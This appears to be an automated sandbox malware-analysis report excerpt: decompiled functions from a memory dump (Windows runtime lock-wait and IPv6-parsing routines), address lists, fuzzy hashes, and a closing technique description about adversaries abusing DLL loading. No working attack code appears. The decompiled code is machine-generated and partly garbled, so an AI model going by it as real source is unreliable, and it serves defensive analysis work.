0x025b14f9
0x025b14f9
0x025b14fe
0x025b1504
0x025dea1a
0x025dea1f
0x025dea21
0x025dea22
0x025dea27
0x025dea2a
0x025dea2a
0x025b1515
0x025b1517
0x025b156d
0x025b1572
0x025b1575
0x025b1575
0x025b151e
0x025dea50
0x025dea55
0x025dea58
0x025dea58
0x025b152e
0x025b1531
0x025b1533
0x00000000
0x025b1535
0x025b1541
0x025b1549
0x025b1549
0x025b1533
0x025b14f3
0x025b1559

APIs

___swprintf_l.LIBCMT ref: 025DEA22

Part of subcall function 025B13CB: ___swprintf_l.LIBCMT ref: 025B146B
Part of subcall function 025B13CB: ___swprintf_l.LIBCMT ref: 025B1490

___swprintf_l.LIBCMT ref: 025B156D

Strings

]:%u, xrefs: 025DEA47
%%%u, xrefs: 025B1564

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: cc6632e8aaf27dc846a8729c2a1933ef947f60969fabf6ef4bf6f9a8f4554fd9
Instruction ID: 4724983a5e847a3c217a1b4ec474ab45a4535fe9e9264e01067169e33a724392
Opcode Fuzzy Hash: cc6632e8aaf27dc846a8729c2a1933ef947f60969fabf6ef4bf6f9a8f4554fd9
Instruction Fuzzy Hash: 1121F572900A1A9BDB62DE58DC55AEE77ACBF54300F448411EC4AD3140EB70AE588FE8

Uniqueness

Uniqueness Score: -1.00%

Function 025953A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E025953A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026501c0;
									_push(_t92);
									_push(0);
									_t37 = E0256F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E025B4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E025C3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E025C3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E025F217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E025C3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E025B3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02595384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0256F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E025B3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0256F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E025B3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0256F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E025B3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02595329(_t74, _t92);
													_push(1);
													return E025953A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x025953ab
0x025953ae
0x025953b1
0x025953b4
0x025953b7
0x025b05b6
0x025b05c0
0x025b05c3
0x00000000
0x025b05c9
0x025b05c9
0x025b05cc
0x025b05d5
0x025b05d5
0x025953bd
0x025953bd
0x025953bd
0x025953be
0x025953be
0x025953be
0x025953c0
0x00000000
0x00000000
0x025d2269
0x025d226d
0x025d2349
0x025d234d
0x025d2273
0x025d2276
0x025d2279
0x025d227e
0x025d2283
0x025d2287
0x025d228a
0x025d228d
0x025d228f
0x025d22bc
0x025d22bc
0x025d22bc
0x025d22be
0x025d22c4
0x025d22cc
0x025d22d0
0x025d22d6
0x025d22d7
0x025d22da
0x025d22df
0x025d22e4
0x00000000
0x00000000
0x025d22e6
0x025d22e9
0x025d22f4
0x025d22f9
0x025d22fa
0x025d2305
0x025d2314
0x025d2319
0x025d231a
0x025d231d
0x025d2320
0x025d2323
0x025d2323
0x025d2328
0x025d232d
0x025d232f
0x025d2331
0x025d2336
0x025d2336
0x025d233b
0x025d233d
0x025d2350
0x025d2351
0x025d2356
0x025d2359
0x025d2359
0x025d235b
0x025d235d
0x02595367
0x0259536b
0x02595372
0x00000000
0x00000000
0x00000000
0x00000000
0x025d2363
0x025d2363
0x025d2369
0x025d236a
0x025d236c
0x025d2371
0x025d2373
0x00000000
0x025d2379
0x025d2379
0x025d237a
0x025d237f
0x025d237f
0x025d2385
0x025d2386
0x025d2389
0x025d238e
0x025d2390
0x02595378
0x0259537c
0x025d2396
0x025d2396
0x025d2397
0x025d239c
0x025d23a2
0x025d23a3
0x025d23a6
0x025d23ab
0x025d23ad
0x00000000
0x025d23b3
0x025d23b3
0x025d23b4
0x025d23b9
0x025d23ba
0x025d23ba
0x025d23bc
0x025d23bf
0x00000000
0x00000000
0x025c9153
0x025c9158
0x025c915a
0x025c915e
0x025c9160
0x00000000
0x025c9166
0x025c9166
0x025c9171
0x025c9176
0x025c9176
0x00000000
0x025c9160
0x025d23c6
0x025d23cb
0x025d23d7
0x025d23d7
0x025d23ad
0x025d2390
0x025d2373
0x025d233f
0x025d233f
0x00000000
0x025d233f
0x025d2291
0x025d2291
0x025d2293
0x025d2295
0x025d229a
0x025d22a1
0x025d22a3
0x025d22a7
0x025d22a9
0x00000000
0x00000000
0x025d22ab
0x025d22ad
0x025d22af
0x00000000
0x00000000
0x00000000
0x025d22af
0x025d22b1
0x025d22b4
0x025d22b4
0x025d22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x025d22b6
0x025d228f
0x00000000
0x025d226d
0x025953cb
0x025953ce
0x025953d0
0x025953d4
0x025953d6
0x00000000
0x025953d8
0x025953e3
0x025953ea
0x025953ea
0x025953d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025D22F4

Strings

RTL: Resource at %p, xrefs: 025D230B
RTL: Re-Waiting, xrefs: 025D2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025D22FC

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 1b4d45a5203d8dd495229f031e9ee1b0d35fcd9046a864d92d328793fe6a15b0
Instruction ID: abf2fa2158e1f2a184ccd716fbf378d964b10aec24e4d4709eaa38f38aec0da0
Opcode Fuzzy Hash: 1b4d45a5203d8dd495229f031e9ee1b0d35fcd9046a864d92d328793fe6a15b0
Instruction Fuzzy Hash: AF5109716107066BEF21DF78DC80FA677A9BF88324F204659FD05DB281F761E8418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0259EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0259EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0258DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x265793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025716C0(_t39);
				} else {
					_t40 = E0256F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E025B3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025701A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x265793c; // 0x0
								_push(_t85);
								_t44 = E02571F28(_t71);
							} else {
								_t44 = E0256F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E025B3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E025F2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0259EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E025B4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E025C3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E025C3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26520c0;
								if(_t85 != 0x26520c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E025F217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E025C3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0259ec56
0x0259ec56
0x0259ec56
0x0259ec5c
0x0259ec64
0x025d23e6
0x025d23eb
0x025d23eb
0x0259ec6a
0x0259ec6c
0x0259ec6f
0x025d23f3
0x025d23f8
0x025d23fa
0x025d23fc
0x0259ec75
0x0259ec76
0x0259ec76
0x0259ec7b
0x0259ec7c
0x0259ec7e
0x025d2406
0x025d2407
0x025d240c
0x025d240d
0x025d240d
0x025d240d
0x025d2414
0x025d2417
0x025d241e
0x025d2435
0x025d2438
0x025d243c
0x025d243f
0x025d2442
0x025d2443
0x025d2446
0x025d2449
0x025d2453
0x025d2455
0x025d245b
0x025d245b
0x0259eb99
0x0259eb99
0x0259eb9c
0x0259eb9d
0x0259eb9f
0x0259eba2
0x025d2465
0x025d246b
0x025d246d
0x0259eba8
0x0259eba9
0x0259eba9
0x0259ebae
0x0259ebb3
0x0259ebb9
0x0259ebbb
0x025d2513
0x025d2514
0x025d2519
0x025d251b
0x0259ec2a
0x0259ec2d
0x0259ec33
0x0259ec36
0x0259ec3a
0x0259ec3e
0x0259ec40
0x0259ec47
0x0259ec47
0x0259ec40
0x025722c6
0x0259ebc1
0x0259ebc1
0x0259ebc5
0x0259ec9a
0x0259ec9a
0x0259ebd6
0x0259ebd6
0x00000000
0x0259ebbb
0x025d2477
0x025d247c
0x025d2486
0x025d248b
0x025d2496
0x025d249b
0x025d249d
0x025d24a0
0x025d24a3
0x025d24aa
0x025d24aa
0x025d24a5
0x025d24a5
0x025d24a5
0x025d24ac
0x025d24af
0x025d24b0
0x025d24b3
0x025d24b9
0x025d24ba
0x025d24bb
0x025d24c6
0x025d24cb
0x025d24cd
0x025d24d0
0x025d24d1
0x025d24d4
0x025d24d6
0x025d24d9
0x025d24d9
0x025d24dc
0x025d24df
0x025d24e1
0x025d24e7
0x025d24e9
0x025d24ec
0x025d24ef
0x025d24f2
0x025d24f2
0x025d24ef
0x025d24e7
0x025d24fa
0x025d24ff
0x025d2501
0x025d2503
0x025d2506
0x025d250b
0x0259eb8c
0x0259eb93
0x00000000
0x00000000
0x0259eb93
0x00000000
0x0259eb99
0x0259ec85
0x0259ec85
0x0259ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025D24BD
RTL: Re-Waiting, xrefs: 025D24FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025D248D

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: b5c8453a600a22872e7ffa143c9785c89caff07ade585a4a4a1db4194d687746
Instruction ID: da7e8409e3906b941f27090e0c69aceecfb44aac57e836d60969d5a54364144c
Opcode Fuzzy Hash: b5c8453a600a22872e7ffa143c9785c89caff07ade585a4a4a1db4194d687746
Instruction Fuzzy Hash: AF41D870600205ABDB20DF68DC85F6A7BAABF84724F208A45F959DB2C1D734E941CB69

Uniqueness

Uniqueness Score: -1.00%

Function 025AFCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E025AFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E025AEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E025AEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E025A685D(_t167, 4) == 0) {
								if(E025A685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E025A685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E025A685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02588980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0257DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E025AEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E025AEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x025afcd1
0x025afcd6
0x025afcd9
0x025afcdc
0x025afcdf
0x025afce2
0x025afce5
0x025afce8
0x025afceb
0x025afced
0x025afced
0x025afcf3
0x00000000
0x00000000
0x025afcfc
0x025afcfe
0x025afdc1
0x025decbd
0x00000000
0x025deccc
0x025deccc
0x025decd2
0x00000000
0x00000000
0x025decdf
0x025dece0
0x025dece4
0x025deceb
0x025decee
0x025deca8
0x025deca8
0x025decaa
0x025afd76
0x025afd79
0x025afdb4
0x025afdb5
0x025afdb6
0x00000000
0x025afdb6
0x025afd7e
0x025decfc
0x025afe2f
0x00000000
0x025afe2f
0x025ded08
0x025ded0f
0x025ded17
0x025ded1b
0x00000000
0x025ded1b
0x025afd88
0x00000000
0x00000000
0x025afd94
0x025afd99
0x025afda1
0x00000000
0x00000000
0x025afdb0
0x00000000
0x025afdb0
0x025decbd
0x025afdc7
0x025afdcb
0x00000000
0x025afdd7
0x025afde3
0x025afe06
0x025c1fe7
0x00000000
0x00000000
0x025c1fef
0x025c1ff0
0x025c1ff4
0x025c1ff7
0x025c1ffa
0x025c1ffd
0x025c2000
0x00000000
0x00000000
0x025decf1
0x00000000
0x025decf1
0x00000000
0x025afe06
0x025afde8
0x025afdec
0x025afdef
0x025afdf2
0x00000000
0x025afdf2
0x025afdcb
0x025afd04
0x025afd05
0x025dec67
0x00000000
0x00000000
0x025dec6f
0x00000000
0x025dec6f
0x025afd13
0x025afd3c
0x025afd40
0x025dec75
0x025dec7a
0x00000000
0x025dec8a
0x025dec8a
0x025dec90
0x025decb2
0x025afd73
0x025afd73
0x00000000
0x025afd73
0x025dec95
0x00000000
0x00000000
0x025deca1
0x025deca4
0x025deca5
0x00000000
0x025deca5
0x025dec7a
0x025afd4a
0x00000000
0x025afd6e
0x025afd6e
0x025afd71
0x00000000
0x025afd71
0x025afd4a
0x025afd21
0x025ba3a1
0x00000000
0x025ba3a1
0x025afd36
0x025c200b
0x025c2012
0x00000000
0x00000000
0x025c2018
0x00000000
0x025c2018
0x00000000
0x025afd36
0x025afe0f
0x025afe16
0x025ba3ad
0x00000000
0x00000000
0x025ba3b3
0x025ba3b3
0x025afe1f
0x025ded25
0x025ded86
0x00000000
0x00000000
0x025ded91
0x025ded95
0x025ded95
0x025ded9a
0x025dedad
0x025dedb3
0x025dedba
0x025dedc4
0x025dedc9
0x00000000
0x025dedcc
0x025ded2a
0x025ded55
0x00000000
0x00000000
0x025ded61
0x025ded66
0x025ded6e
0x00000000
0x00000000
0x025ded7d
0x00000000
0x025ded7d
0x025ded30
0x00000000
0x00000000
0x025ded3c
0x025ded43
0x025ded4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 025AFD94

Memory Dump Source

Source File: 00000008.00000002.2371423865.0000000002560000.00000040.00000001.sdmp, Offset: 02550000, based on PE: true

Associated: 00000008.00000002.2371416635.0000000002550000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371526889.0000000002640000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371534575.0000000002650000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371542865.0000000002654000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371549334.0000000002657000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371556151.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2371600750.00000000026C0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 955d95e47e206905a3aff7cff6ea109451f143101a2e423e4eccdee1d3e9f1b2
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 6091AF31D0020AEFDF25DF98C8567EEBBB4FF85308F24846AD445AB551E7324A41CB99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
